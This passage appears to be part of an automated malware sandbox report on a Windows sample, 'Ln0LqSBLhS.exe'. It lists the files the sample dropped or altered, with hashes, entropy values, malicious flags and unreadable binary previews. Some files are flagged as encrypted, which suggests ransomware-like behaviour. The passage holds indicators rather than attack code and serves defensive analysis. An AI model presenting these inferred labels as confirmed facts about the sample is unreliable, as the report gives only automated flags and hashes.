                                                                                                                                                                                                    Preview: @3u..]..w...9Qrd....7.V..`hr.Z>.$D..oD"*x2..Ov&.-..(...V.I3,..Or).x.&po"....M...f.H.."C...Ok.....k%...h.9.b.....O...V:....Bu.e..C.|..../...)...NIL.C...E<+`j0.C.gH{.`...V.L^...]o[.".XTt.N.y...Y...i.#.![...%...........KRRl...e..E.J%j&.E.....4b.$"U.k..H|.O.%KL...7,.-. ..j.o.:.yBmm.k...#_.Y ..ks..'.R,.Y.g-....(..J.q.,.):.ky^.'.gi..Fz..2......_-....<3.\.0.+s.....2.f.\....&..5.. .....Gt......,M..=F....Vx.q\e..;..R...}...Ct....@'....S;y8.....R.]O..*..2..k.8..`.(d.x..UO..d;u?.ji.Q..Dp.T...U...X..U..O.....z..;.C..8.P.......p1...s.WS.....fl......{..\d.".M7p.A.2`...........W...Jm...WY6..%%..^.dAf.0T....C..&..'.?..e.=...%..d).U..eUA;....j....i.5b...\E]s.t....}F.N/gU.....F..9i...D..1.-.d*...c..M.9_.q..V{.3fE.l.#.!...E..6)..4l.B.....,.#.0..g.e..6...6....MS....Y...S.N..3.....kV...9..A..Is."....k..LY`K...-..E.,...\...I8......$}*.R.o;>fF..I..Y..g..g.........N%R.n.J..../b...uh..O....b..f..<.......Y.T..&........Z...^1([....A.Op7.....2l8e./..FS&.^7^..$:.^..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):131401
                                                                                                                                                                                                    Entropy (8bit):7.998609319543536
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:C75JRHBCTWIWmI2xO50+BKV7UJ1H6d6+A+SmsiUEqEBHcp7sqT3QG2lTwGUuMYM9:z6WI2Y5lKoN3idq8HdBTaHRd
                                                                                                                                                                                                    MD5:1CE6677AF2F4506D413005F4B1FC2502
                                                                                                                                                                                                    SHA1:8A95B064216E95CC639F6546FAE12B7F560B74D1
                                                                                                                                                                                                    SHA-256:9ABB3A9FC4ED53FA58415731C7989FB3A3B105ADE519FD9CA769B488924C5E37
                                                                                                                                                                                                    SHA-512:DB3F8ACD78CC6B643299C9D30D4B8A5832A9788BDF844F5F55A9E6EC097F2FCBD8DC409041906CF90410C4E08846D05CFB5D450F25AA37E53AB93CD1873FD7B1
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .].vWprPq.1'......^....p"..O.xv..J.?P...d..{pL.X.DA\...\...H*.=..[..]t.....4..e.Z....).h.i%....W8....]...'d...%yC..}. ^..5]g...f.t.jx.PLO.L.)...Pl.Q}..+... {.........IL..D&.Uap.D(.x......c.......h.........H.Z..:.b........<Mne$...Rl.tuT.i..._.D...(.n...4..R.'...T...P::T.eb.,B..f......1...{..9g.....`...5.g...PX..sQ.;....Z....y..hz..G.....9....gZ...f......Q^.+J).X.. .`M....3.c.>...Z.Z@3.+.^2w.Eh..^@.j....;G...F.._.F.-.-d<..$hi......*...G.1.c....xVLqP*")a...n..1.i..7....7=...C ......m.t.pv..Z..+.z.).x....a.."HD....aH.n..u.....~.>.1...A.......5dmf...?...p..(.i7..^.....L.f.d~...iu....Md<...E.*..q..l...E~.....Z...w.M.tp%|.....=.'B5.1D.5....T.|.N.x..,~..d.:......\4.i.....j.jk.Wi.....n....*.a$C....o.E.h......P.5J.....EhZ..M.-....X.qLW.K{..<.]e...=..(..C...;..Z..R.....e...e..g.^$.2.*i.o\/x..D....i..xl....2]...x./c....e.]%.n...C.x^C.>.p.T.a.K....:......x..6G._....N.'...z{].!|..>.t.F...p.....G^..#...B.>.[. =....&.5#.....U.........n
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65865
                                                                                                                                                                                                    Entropy (8bit):7.99725418697726
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:hf9GGbRNBkxgHKTmAvtFwY+d43yy7m10NsLrgqOwCezK5S0un:hAGbRNBYGImifwbh0oXzKo
                                                                                                                                                                                                    MD5:F97AE5D261250625A518B9FB60D4A441
                                                                                                                                                                                                    SHA1:AF5B526BFA2660A6B098255937B8486177EB851D
                                                                                                                                                                                                    SHA-256:FBF88866E541B6BD318AE1BD792B0FFD2B8E61433CED5C95557703F57EEB1DD7
                                                                                                                                                                                                    SHA-512:D009C1388AB555963875A7177641192064C3D1CBC36936C6DE4D10003A893B58ECA9244B5AB1DDCBCF4F16E59E2A69312EEEFA243819285CF9B3AAE86CEA8ACD
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..^pF.s..4..!...C_.v%..p../.$cP......_Z..B..;.P...KSi;*.QVZ..FA..EW. ..(..Xk.=...12......K..(J|ym.....K....~_. .t.h..0r.rg..E.B~.iq......#.|[(.H=.. .....PHh.5.........%.ka.:..dP].K<../....~...Wh.......8P..Y.L..8R.j.~.:M8...W.z.....K!.K....S).YwFT..X..0..q..G..3..6.....`.U.&...BBU&5..&..\iF+x$.....r..8..A;...#F-%L.......1..f..c.2(.......z....i..Y+..h....a....=6Q......U.._p...j.].B..+.._zS....g..}~D...<+.D..O...........z#..'....m..4'.R......g.P.]....YK.N.E.LM}x6V.g.2.(.7C>.=.....8^U.K...5.Y...y.....M.,...Z..(-:......d.^....<....r.3.$.3.C....L...m..s+0.....~.A.H/g.tw...F.\2......Ia.....b.v............":..3.6.d.g.F0..M.^.-.....d.dF..RP`....t...#.\.aa........*..K......_...w....,.P>m$..`..~.e..4c.)..^.}Y....T.I}..y.'.......~....2n.....Y.CN...6......t.......z."...4...."-......;..9../...3cRd..!..Mv.c....;...d?2Hb....c...\fT?...O........6.Q@../.5DH.(h.r.=.........G..3.fz.eu.$`3]..)..i.zN.!.{.l.3........@.%.P....L....u.}p.`....!.y!%m&.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PGP\011Secret Sub-key -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975136242898774
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:BXc3eqpkvs6+aCeciCu89S71mS4thJmxNtT0M+J+EA:B/Ks+aCe+9S49TmxLT08EA
                                                                                                                                                                                                    MD5:5CB2F54619B8D1408E4AAB81A456987D
                                                                                                                                                                                                    SHA1:CEF9B0BF0A46D32E1F67D6D7A698345F63C20738
                                                                                                                                                                                                    SHA-256:2D3E8233620338E91BC68C82FEB17B4FD4C1738CCC1DD8306A567DAE1D96D08A
                                                                                                                                                                                                    SHA-512:0DE3764B43C702B20E2138397FAC13B0C277ECA131792D9FD5FAF13E46579D3F56BEB15B89A6E492DEA409FAAAC298F6D096EE0098FA0DB652E88A6C094C352D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....:...[F.....l. q...'......g.>TW...).".9...J.E>iN.4".j@.......@MF....z...@..h.../K..KR. ...{..;h.':..............&...s...d..~.......k....-.......V&.}....PVBN..[i&5>.N.G.w....}..+......(.FO.J}..Jv#.H|._(..9..t../..t..?.4k.M.?....Y7/.B:3..Cvg;....q<.G>_\..4..]1..oVq....R?H:.......G.~<[FB:.....+.....>.N....z..p<.X.g|R-g.....)....... .>.an..]PZ......K.....hS....1./`...(.....:..Y..'q....$.#..6#....T%...>.Dw..NM..7M2..Y...WQ...........K%..2.+.<.{I.J.ty::...+.j..=...~.....T..E.......(.Ao_.Gn.H1.Q./..f..m..[R......W...9FK...H.....2pm......kt..}......C...\Z...P|z..'..3[Z...v...4........eP..e.k...l..XfPM.u_../........M.a<o...\`.s.].E.F.}..xU3..EN|..LR"....x..br..C.8...q.|..0t.v..]..<Z.j8k;......N'.....=2.0&/3.[l..F.a......v...?.s.n.H9.[.E..c........@.i(......X.<.vtkx.e2..^$..:...#.n.2Q....d.S.g..l*W...../H.}......!..x.I...W...f.N..p....\$.q.a|..e'..d...;.9......4....zkiv...Ph....`F.Y./H "Sb.J.I...c...*....H..v.....LuV....T?D,.f...K.?X[..].X...Q...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978741553363721
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:bimSmaRl4Mj4IJBwT6VquOHzZ6Jk+x53uwEatZrf:CZAMjxBMPuuZF+x5eEtZ7
                                                                                                                                                                                                    MD5:FE482D9C8834260E1F43731B18435C91
                                                                                                                                                                                                    SHA1:6F35C55262CB774EAD15A59FD941B5980CDCC7B9
                                                                                                                                                                                                    SHA-256:878D7B83C704847D652637BC4080AA5FA7870F149681FECBB450D0B1B915029B
                                                                                                                                                                                                    SHA-512:24E15A8112084A3A7FAA4A5A4FB6FB02EA0EC6FB767DEADA3DC8400A031DC0609927BB3251F984479003EB3AC5FA534F9E3858C1AF221F77FF813A47EB90443C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..i. ....#.Jt.z.M..d..Cg`...q...E..2lK,`..iT.V.Z...K....X ....^..R.M...../...n.Q.H.Y..a.xk.?.kK|&.l..yH..%.2$...a..3...(...x......[.jX.)@'\....z<.Q.$.....k..e|...(.E.........tL$..*$..F./.1....../y...*.SD.1.7...E)^..H.7....UC~F.'o9\.....b..&.L.L......_8..h.u.A......Wx..n..3.V.z.`.F.G.4..%..c2......V..Y.&5.YpT..B..-...2/..J.!..,..,.C...q..H....*...z. ...u.....X.....a....#Z...PJ.7.o.m..@......"E.uI..S.{..../..Y&p].z5...I.!3i>+d......z...%.p.jx...&..LM.[....8;'h....n.G..b...D...q..G).$...z...X.{`..)..^.eD0J=../X.0..3..........D3..W......K........P...5..ri..c-.x..)..gk...c]..3...}....i.....M.6.27..0.".R.V{X.$.u)....k...5.}Z....{.3...E.T..f....?e...Z..Zx....<..G....j>.*9I.#...-?,.......=.-...U....S..I..ai.1>.)mM..)..u^E....~....@.U../~....-....W....r..`....zQ..x2p}.L.,.^J$@F.U.b.+sO...6.i.$..>iW.....7.K.c..;.55.4,.[..LM..WL,....C...9..D........7....%.;5.W..;..6l.Z...N8.[.....l..:.w.&.f...4.z..]vJ.7.....v...BG....y.C..P..d....z~...w.Z....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PGP\011Secret Sub-key -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977364562353882
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:kVe8FLA3RJ6v8LKg2f/eUQWLKXnb65Jkq3xgJYn/:kfLA28LseYLenCLxeYn/
                                                                                                                                                                                                    MD5:AD5687E8702024F714BDC2BE1564C9E8
                                                                                                                                                                                                    SHA1:7E74039752CFE92A116CC087FAA88B2D8602D825
                                                                                                                                                                                                    SHA-256:99A9248167578FBEA0CC49F88256DE9D9BCA00BEFB8DE295F5C10FD52D522BB8
                                                                                                                                                                                                    SHA-512:83A14522C0764ED317F77D962AB63F503B52B50A234684237DA52B3B988C1F723D814797706A9081F520AE77909F34CEA295E2B5EEC84687D8D363877AD20B50
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..y'....1.z|....eC.....~....<....JAW.wRF.......'..z.z..L...+..)...-k.{i..uBh>c.L..0....k....1.5w|.yiMz~Q.y.Q...!......2...^]g.q.%.l, ..iHa.>k...:m...y.4c..P.@.3W3....Y.5.....|.......=..z.t&.........H...F.J.!......y..".m..o...mG-^Ru.nE,|.W..Q.%\<.!..B5..c...C.dE...nHY.m.e=>...7.'..c.B...........>.U.Y.......$_.3E..v-_......"!u-9G......3.B......*..R;..C..,.I...-I...M<.;..)._4m.>...^5.T..tKV.......h..^a..p...b..m.m.NG...Y%.OE.>+_j...h..F..~i......$.e......l.Z..x............W.."...HyW..r.,.[P.`M.tv....w.v.L9...I...T..,.Wv7..nb.]K...j..lP..8.B.Uy(..0I..,..iH..Y8.*".......'..O.=..!.dEoY........}.C..9...<..:#:...v..3..!$..:...\[......G.....]K......v......2..?.......*.X....}.%.#9%...o..0...W=...*.h_.............2.-....zp+...16-..e.."T....2..-.d._3#...$...@S.._-I....-pu.E..J........m'...iw|/[..Nt..kj.n...O.K^.Q..76.....ve.....R..m......u.+.*[.Wr...(osV.......N..[...jv..".......}.@zP.q.:/%..!.iH.^+P<{lx'..G...Ea....'X..a...J....4....U....4.G.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9773212683668495
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:F3Z5nd/9BjPJbv7BNAZaQM54d6lC1OerCn+EMS9TT43k6XAKpF6QH:5Z5nd/PjR8MtgZ1lC/J9n41QaIK
                                                                                                                                                                                                    MD5:E6FC5CD6E6416BACF9B8F1FCE9BA8536
                                                                                                                                                                                                    SHA1:42A6CCF8CB8FAB57EE8C3D05A429D557A2193922
                                                                                                                                                                                                    SHA-256:2DED1290BA939688891540A604B5313F1C32155E68079300DD0E1CF2FF1550E4
                                                                                                                                                                                                    SHA-512:6A880C1BB0169BDFFBDC42A1A95B2B21994AC91BC93AF46E7D88822092F6478F3F619E90A0D024C5753292B6F323E0F209A292947A982E81322EBD501AFDDE2A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: FRw/..L"....#m...).......G.....(...=f.Z..:<.m.9....cM..<N.l.......][Y."....d.O...b....#.9Ca..H.......=hX.}2M.7A....-...R..K9.&R....uP<..../...2....L..".'>..2..3.R.N..rZ$...].}.V....A5.5.|e.P..5. =.%.1X..%.=..(.!"...#u..^K...n.......a.V....@r.R.....v3..^.tE..x.QR.Wz.a.#.1%<...TR?...G....e\..i.'...V..\+.u.P..B]v.#:...3.K.Y...v.p..kA........7..D.]...@...H.z.....[...1..n.k...j./.[?b.p.o.Q.{4f,,..~...5.!.(e..e#9.[.v..J..p.1..C...........H>..@d8......y9..=...CO}.......%N@..-H\.....A.j.................~.*#t...CeH..,%......!..1C.T..w./q-p..T..T..E....@...<..../R;P....}.|D.....2.......*....@.zc....hLC.)6E.N.U.784..X....?V2....G..d...4_...a...Zv.$.j.lD.................2.S..H.9......F.zf7Q.d........G...<.G..^.'..dc..C,=..q............0J...&.k.^.y..yY|....s.......|.Q.........aC...y....oq`1...\`....@...\.....aQ....m..e>....p.R.jW...:(...-..G...?7......l.>q.....;a.0s.......j....@.J....$.G.A.V.}..y.;.D...?..|.G.6..!..K.~...hy...Zf1.....S....&.T
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.981390576592673
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:qiwISB6KpRRJE5AtIwZmxpeGXrlGmw+lTaUThPEs2B7:qvIcpRXLZmKolNw+VFTE
                                                                                                                                                                                                    MD5:F549ABF0853F5F63C7E49F699C41CE99
                                                                                                                                                                                                    SHA1:4FEB12BF9F118C791C17BEA05DA5E91AB683EDEF
                                                                                                                                                                                                    SHA-256:C84FD5D696160558FF53EB7181FD73A481A44FEA26B9586D38E0289C909408BD
                                                                                                                                                                                                    SHA-512:E02670158FB230F3FADFE2FE2B7D2BD374AE770376227D9BA6B09F2A4A2B09702FAB03B84D579EA6B1E28F3FCAC6685230E17077D9534ED5BC829D871593024D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....Y.......y.O.s..V.a.E...9.FI=.a......O...>..$ZQ16.'/.gc.9r..ID..*.]....C.6....+.O.xE.D..LJO7R........dFb.U...aw...6.h..+.IY:.D.....Q.rV.#PVc#..F0....<....b/$....3c;........9.F\F.?.|.....`...b',.NG......._.B..E..'.J.qamD.._.g.u5..D...|..*.u..wS..k....0..B..d.%~..Wz..v...hA&...y.]..y&..Q...eU..W(,....i..w_..7..5.bk....h....T......s.H(..{+....._-.G....".+..^.{...}.5._e........+....y...G......Om.nN.(.C...,}..o..q.D..r..D?J5,..eM...6.4..c...,).T'..A.f...._.....F.ZX.D...7...^9..P.w.qMb.Y...!?U...P,.../ZaxM$.....t...H.TB|.!...C....@wA._.(/@v..D..Y...tWV..0...9....Y...,r...A..D_;...&F,.}A..+.#}."dr..#.....q.8..m=tdHh.JV@.TH.dI.n.$.P<..:pC.(....+.F..hnZ...._....y.gg#.0..r.|.$.8~f*.8...o........i.(7...........!.N...O.......OL"...0..wv5.D..X.0...mJ..\;..=.z.VW.a.4.>....Y........'K%vDE.k...<\....koX(...P.2.. ...M.......|....-]$../.....%..[a!O.V.m...L'.R.k....`..T....B...:M..D....B.Y.*...Rx...m...\...w.P.......s.N..5O.d.............w......x[...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:zlib compressed data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978990357073084
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:wAgVJQ97CSs+s5HYLqa/qxIkSqiFeuiEGB3E4I7iHkC5hiL:wa9ktE/qJiFyEGBU77iEC7iL
                                                                                                                                                                                                    MD5:90819341D6ACC36733383A93023E9E5C
                                                                                                                                                                                                    SHA1:538A2BE63C7E010EAAA222A26E1A91FD47A1DB9E
                                                                                                                                                                                                    SHA-256:BBC5F2813EFEC448BF0050262952E1EBC44E3517D046D503E8F5B895C44EEE29
                                                                                                                                                                                                    SHA-512:04FDF84FC524B1B16D30F42235B1CDEBBBE490D2793AB408499623949020234C880B4318CEC73A0C9DD79B230239371907696A9AF7432EBEAADD664EE9399BC2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: x}.......,.Q.>3yc..3..1#....x.........$G.-"....&...z%.o\X......}*...L.5..p9^..."=6a.:3.,./..T.Y.....1.T...$.....N...}.-..'..Y.1kaF..J..}...*.vN?$3F.-....m.V...|>oI..4 ..j........]..j+..u.^Y...v.[..3.NDyFOJ......uFS.._h^.M.5.\s..Mv...:..q......t;......7.!+i.`........-/6N(...S).LoX.i..h./8V...E.o..Vl.{.=.W:F\.&c.pj.....K.N..U....4_......R.....C.!.......*..gl|1.#.8.. ....\#W.....]Wk,.qI)..(...L+..D#Fh.9...[..0.P...f.]j...06... ,0/.5.........l...=Uw.$../*}.@1..g....I..m....<.H..h=..,r. .k..;..2...w..ZS...dC.5.+.....0?..i2.o.1.2...-..*..>..qTq.hy..E...cie..S...........4%.v..^=...YQf."e....(..."[.)..x.....\.*.c........4>.._............JA5g..Y..Mo..P.3Y8..;.{..f...(._F.)R......l...]..*".....l.z]..R.................8b.`..T.....W..f...x.D...+?.#.....P.>..,...+.Da...K.!.~.".....&.W.>@..`...lZ....R-.%.;"..b,.,...h@.a.._.=_./....)..NG..I;@..O.3..1.K...v.1......K.BOV6...9...;Z.cr..x....](~h.....pP...Y_..{.i3..W.rH..*.$.d..*.].._.p...w[v........F3._F.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97363157226443
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:RF/jTBNHaip+b85MZsKtJImIoVJvLALBqgzpKYaYtbz1ul4ahLELGy3ALy/6i:RFrTBDpSAMZztJTIob8FKnYtz1u7ELGK
                                                                                                                                                                                                    MD5:482D7448F67BD6716B024D5B6F751706
                                                                                                                                                                                                    SHA1:B2130BDF09D6D8A6284E833D9B22D5D138AF17C9
                                                                                                                                                                                                    SHA-256:D32ACF26FC65DA7CA217020FE443E0B1471803441A51E561E50859C0B5A32091
                                                                                                                                                                                                    SHA-512:E3C040D516006786F6B7D694D1904C9E9636456299C5F91793026B74896C8913E098B90849F3471C92BC71CD5BE55E7B4CBB68FA61FE65CEA68E49801D84B53A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Z...q.b..u.!...G..(.5..TRH.V.....'..W...H..<....o..hw..........L'..j .a.0q......2r?U."T..S....y<D..aN..j.j..@?.+.X....c.e...6.......^..gM...S7...2FF....a...<..9..,..cO.s.x<.....cF....\..._.|.....d4..nP..m.3..B...n..Q_;...4....f.^..7...4..F._.......1..8BM.c.....~........"......D].S.D...|...g.....\..Ihz...X....#..M..ID>.3...!.w'.P.%=n..yG..s....iM.7W....ypz......v..>..es...~^F.../..D...B....B.......r1$&-..8t..FU.O4y;..p.t.>}=4......U.......$.X$9..\.`........Na.>....j.@\F4......^kW..'....w.......,.=??2.;R.*`.;........a.kw.I...b.o".$2..Z..5L..=.u-8.t.z...;.+..d.n1....y.?|[.ZV.'_q...jZ..!..0.:........J~Hu....QM.$54~..+..x......k.7.....-..8...54.._...g.+.raj9.M.......f3.0...b.$.>.....Z...w..6HL..tR...kY..K..^...V.Z\.@..J8....e....ULcjm...u...uy.......zN.v]8...m+....z[w........+.jK.9s..K...$......1.>..Sb.Ua@-.%7.+tw.7.F.].}.H.....!.....9_.....?.iU=......%..z_0z......N.EQ....K.........2#)....~......O7..|P......uE...a...AI-.A';2.eu`..6.?..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980731460712496
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:z+RM24v+l2//9nJBWnc6MSeVjHH70BNTWTc/Hajk:gM2VlC/9nJBWwHb2BhT
                                                                                                                                                                                                    MD5:FF19E20DBFFF9A51301C66A6DC7C3BDA
                                                                                                                                                                                                    SHA1:4E154717F9727E75662BDEC7516992DBBDF99695
                                                                                                                                                                                                    SHA-256:12D671CC17A6AC9DA64FADD9FEBE5512A641CE83A73D35DC3174A4D3146FE687
                                                                                                                                                                                                    SHA-512:E1E14CCE8DBC7EDF5A7B1BC270BD35F0325A6C39327F0599633E0234847A797C70D906A634F2D70FA21C0F813F071C02192B4E18A0097BDC2FA51CEE53C2A77C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: S.......VO..3.\.,O...)..WI.f..[.zi......M+.......u.v..0.]#.w...T.*w.^...h.......g.%....Z..*C....~....3...*.*......;..'.@dN.%Y.p1.6..,...~..e.2.Z.. ..,....N....n.]zs...i..#.1#..4.}.J...Q.....r.O\W..o.*"R.e.z......uX.a.<..x.c._..).72..H.QZ..(,.`..=lK.........Uu...yFj..>.c.....2J.gs...j..h=?:.;8$.1.^..j....L5..J.^T....5^S.K.1...%.....7..Rl9C......@......c7...@:%.G...GS....6y.....k...I}.......a$..'..p~.C.).".p./.H...d..n.j3..5.......R.M.5.n........[..-=V{sl......u...f.K3,.d_..E...Y.4.i.j,..z.`...5.*....j:W...Qx......_r...E....u...B1...i...........B.1.X<P.K..&i...6...Bl..C.=.=N....A.hI..8fx^...........3...$.1...4]..3..].?...d.^...C..[s..#.r(....AP.{.......-.M@.X...)B8....A....N.[.;@..?c......+.w.8dJ...J:.Y.x.C.@{fr/..$...4....U.&....NtP.q........e1.... 5..I.'.......\.7..s.<.'..c.f....#.....m_..L?......h.....UD....X.*=C...x.9.g.8|D.N.p.)v..#....>......./s.....[..cL..w..^B...0.~~.....k...X.....d...9...H....A........;.s.I.a.].(...=..w.......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97717328390185
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Y0e4CIkLGLNejXW6zfcE1EoMeZuAJKByrAE:Y01vkLGLN8DzfcE1qiQS
                                                                                                                                                                                                    MD5:323A3C6ABB3F41C44197C24304BC26EE
                                                                                                                                                                                                    SHA1:803CAC69A1DCE8F7163CA4F7B0DA91758B47900E
                                                                                                                                                                                                    SHA-256:73D1C1DDC753C543F2C18A6D5FECE5E8CEBED9AF5E593022F581B7908E301BCB
                                                                                                                                                                                                    SHA-512:FCA4655E336C3CEBA10A7681A1EDE91826FEB6705C7C8F211DA5A6D8BDF7BE7A2D8805F412BD1A77CD863390B93FB2FAFA40B528163F872858D4CA1D1A18C558
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..xVB.#..,-O.4j.A.g..`...8-....Y/...|V.F..A.xv..bt|...F....t......C%.F...}.,.'...3.4..^.....G..|_..W...!....3...5'...BM...N\.)A..^.*A.?..0.H..Ei.......4..S..F.b'N.b..;.m`6N1..O.G.t.K29....^k.....4..-....".$...:..4DU.!...".Ez.{.........o+f..%~.>..oK.${&..;"..4..E...~...b...%.._..3.].4.....'./!.R....Z....a.'......wR..p...y..G.....u}....C..k0jfu.4....w..%...A...N.....s.@E5~.?=...._^.Wy...r...lB.|>........(....R..jV.%}.x.v.......$..>..D....w.A~..</.J.....0......Br..k%..W~./.m.l.."...(......H..X...MN.J<1.z..W....5............J.X...k!`ign@r.J.P6 .+K...j...[..{..?+.H._..........R..%....e._..6$.U.......h4.86...<......N.a.x..G..........q..d.#.....'.k$9.l.H....}gf.:Z...;3Y../<.'0l..o.)6?.?e.[=.2D..r.F...W_...Zj...W..*.7i..'...B.<+......b.........V..qT..a...fo;..?..V..j1.t........}rM...X.O.{.C......fo.eS....Q.....KR....,:.f@...O.|5T..$.bh......[W...M#G.=G.t..k........0S...[i..G^/...0"".[.z.p.\[.=.2.u.#f..zlU.b.G.......>..yPHd+LK..Ux[.wR..o...9..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975043869596671
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:hK1kjGH+KtqDp8O+K0iNsJaNqGkR3vpRI1u6yNcM8sQe4:1yv+p3NsQNqGxC8s2
                                                                                                                                                                                                    MD5:37E1627B621F4C36C32A823503C70573
                                                                                                                                                                                                    SHA1:4FE741B2D126125B46AAC74BCE294458E6CCC513
                                                                                                                                                                                                    SHA-256:628E5FF46542F83EA2591B0701105584DEEDD290BB01B5EC2EC599FAA6969559
